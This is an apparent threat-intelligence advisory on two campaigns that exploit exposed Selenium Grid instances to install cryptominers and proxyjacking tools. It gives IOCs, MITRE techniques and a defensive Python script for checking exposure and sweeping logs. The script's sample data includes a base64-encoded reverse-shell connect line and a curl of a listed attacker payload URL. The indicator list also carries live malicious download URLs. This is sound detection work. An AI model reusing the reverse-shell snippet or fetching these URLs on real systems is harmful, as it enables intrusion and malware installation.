From Automation to Exploitation: The Growing Misuse of Selenium Grid for Cryptomining and Proxyjacking

Sept. 17, 2024, 11:28 a.m.

Description

Two campaigns targeting Selenium Grid, a widely used browser-automation and web testing framework, have been identified. Selenium Grid has no built-in authentication, so an instance reachable from the network accepts session requests from anyone who can connect; both campaigns exploit misconfigured, Internet-exposed instances of this kind to deploy cryptominers and proxyjacking tools. The first campaign injects a base64-encoded Python script that downloads and executes a reverse shell, then runs follow-on scripts that install IPRoyal Pawns for proxyjacking and TraffMonetizer for bandwidth monetization. The second campaign injects a similar script that downloads and executes an ELF binary; the binary attempts local privilege escalation, connects to Tor nodes for command and control, and drops the 'perfcc' cryptominer. Both campaigns show that an exposed Selenium Grid is an unauthenticated remote code execution primitive, and that such instances must be placed behind authentication or restricted to trusted networks.
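The two failure modes the description calls out, a Grid that answers without credentials and post-compromise activity matching the listed indicators, can be checked with the script below. It is an added example written for this page, not code from the advisory, from the campaign, or from the Selenium project. The Grid `/status` endpoint is real; the sample status body and log lines are constructed, the indicator sets are copied from the Indicators section above, and the base64 heuristic is an assumption about what a request log might contain, not a description of the attackers' exact injection path.

```python
"""Selenium Grid exposure check and IOC sweep (added example, not advisory code)."""
import base64
import json
import re
import urllib.error
import urllib.request

# Indicators copied from the Indicators section of this page.
IOC_HASHES = {
    "96969a8a68dadb82dd3312eee666223663ccb1c1f6d776392078e9d7237c45f2",
    "95aa55faacc54532fdf4421d0c29ab62e082a60896d9fddc9821162c16811144",
    "44e83f84a5d5219e2f7c3cf1e4f02489cae81361227f46946abe4b8d8245b879",
    "31ee4c9984f3c21a8144ce88980254722fd16a0724afb16408e1b6940fd599da",
    "22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13",
}
IOC_IPS = {"50.7.74.173", "212.47.244.38", "193.168.143.199",
           "173.212.220.247", "95.216.88.55", "154.213.187.153"}
IOC_HOSTS = {"www.xt3tiue7xxeahd5lbz.com", "www.os7mj54hx4pwvwobohhh6.com",
             "www.kdzdpvltoaqw.com", "www.fkxwama7ebnluzontqx2lq.com"}
IOC_EMAILS = {"funnyralph69@proton.me"}

TOKEN_RE = re.compile(r"[A-Za-z0-9.@_-]+")          # hashes, IPs, hosts, emails
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")    # long base64-looking runs
PAYLOAD_MARKERS = ("import ", "socket", "/bin/sh", "subprocess", "os.system")


def check_grid_status(status_code, body):
    """Interpret a credential-less GET of a Grid's /status endpoint.
    A 200 with value.ready == true means anyone who reaches the port can
    create WebDriver sessions, i.e. run code on the nodes."""
    if status_code in (401, 403):
        return {"exposed": False, "reason": "authentication required"}
    if status_code != 200:
        return {"exposed": False, "reason": "http %d" % status_code}
    try:
        value = json.loads(body).get("value", {})
    except (ValueError, AttributeError):
        return {"exposed": False, "reason": "not a Grid status body"}
    if not value.get("ready"):
        return {"exposed": False, "reason": "grid not ready"}
    return {"exposed": True, "reason": "ready without credentials",
            "nodes": len(value.get("nodes", []))}


def fetch_grid_status(base_url, timeout=5.0):
    """Live variant: probe http://host:4444 (hypothetical target) without credentials."""
    try:
        with urllib.request.urlopen(base_url.rstrip("/") + "/status", timeout=timeout) as resp:
            return check_grid_status(resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        return check_grid_status(err.code, "")


def ioc_hits(line):
    """Return the set of page indicators present as whole tokens in one log line."""
    hits = set()
    for tok in TOKEN_RE.findall(line):
        low = tok.lower()
        if low in IOC_HASHES or low in IOC_IPS or low in IOC_HOSTS or low in IOC_EMAILS:
            hits.add(low)
    return hits


def decoded_payloads(line):
    """Decode long base64 runs and keep those that look like an injected script.
    Heuristic assumption: the injected Python arrives base64-encoded in a request."""
    found = []
    for blob in B64_RE.findall(line):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if any(marker in text for marker in PAYLOAD_MARKERS):
            found.append(text)
    return found


def sweep_log(lines):
    """Return (line_no, kind, detail) findings for IOC hits and decoded payloads."""
    findings = []
    for n, line in enumerate(lines, 1):
        for ioc in sorted(ioc_hits(line)):
            findings.append((n, "ioc", ioc))
        for text in decoded_payloads(line):
            findings.append((n, "base64-payload", text[:60]))
    return findings


# Constructed sample data (not from the advisory): a ready Grid and four log lines.
SAMPLE_STATUS = json.dumps({"value": {"ready": True, "message": "Selenium Grid ready.",
                                      "nodes": [{"id": "node-1"}]}})
_PAYLOAD = base64.b64encode(
    b"import socket,subprocess,os;s=socket.socket();s.connect(('10.0.0.1',4444))").decode()
SAMPLE_LOG = [
    '10.0.0.5 - POST /wd/hub/session "browserName":"chrome"',
    "10.0.0.9 - POST /wd/hub/session payload=" + _PAYLOAD,
    "node-1 curl http://173.212.220.247/burjdubai/.jblae/y",
    "node-1 sha256 22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13 perfcc",
]

if __name__ == "__main__":
    print(check_grid_status(200, SAMPLE_STATUS))
    for finding in sweep_log(SAMPLE_LOG):
        print(finding)
```

Run `fetch_grid_status("http://grid.internal:4444")` from outside the Grid's trust boundary; an `exposed: True` result is the misconfiguration both campaigns rely on, and the fix is a reverse proxy or network policy in front of the Grid rather than anything in the Grid itself. The IOC sweep is exact-token matching, so it will not catch indicators that have rotated since publication; the base64 check is only a triage aid.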

Date

Published: Sept. 17, 2024, 11:14 a.m.
Created: Sept. 17, 2024, 11:14 a.m.
Modified: Sept. 17, 2024, 11:28 a.m.

Indicators

96969a8a68dadb82dd3312eee666223663ccb1c1f6d776392078e9d7237c45f2

95aa55faacc54532fdf4421d0c29ab62e082a60896d9fddc9821162c16811144

44e83f84a5d5219e2f7c3cf1e4f02489cae81361227f46946abe4b8d8245b879

31ee4c9984f3c21a8144ce88980254722fd16a0724afb16408e1b6940fd599da

22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13

50.7.74.173

212.47.244.38

193.168.143.199

173.212.220.247

95.216.88.55

154.213.187.153

www.xt3tiue7xxeahd5lbz.com

www.os7mj54hx4pwvwobohhh6.com

www.kdzdpvltoaqw.com

www.fkxwama7ebnluzontqx2lq.com

http://173.212.220.247/burjdubai/.jblae/y

http://173.212.220.247/burjdubai/.jblae/pl

funnyralph69@proton.me

Attack Patterns

GSocket

perfcc

T1574.006 (Hijack Execution Flow: Dynamic Linker Hijacking)

T1053.003 (Scheduled Task/Job: Cron)

T1568.002 (Dynamic Resolution: Domain Generation Algorithms)

T1070.003 (Indicator Removal: Clear Command History)

T1059.006 (Command and Scripting Interpreter: Python)

T1027.002 (Obfuscated Files or Information: Software Packing)

T1059.004 (Command and Scripting Interpreter: Unix Shell)

T1070.004 (Indicator Removal: File Deletion)

T1005 (Data from Local System)

T1496 (Resource Hijacking)

T1140 (Deobfuscate/Decode Files or Information)

CVE-2021-4043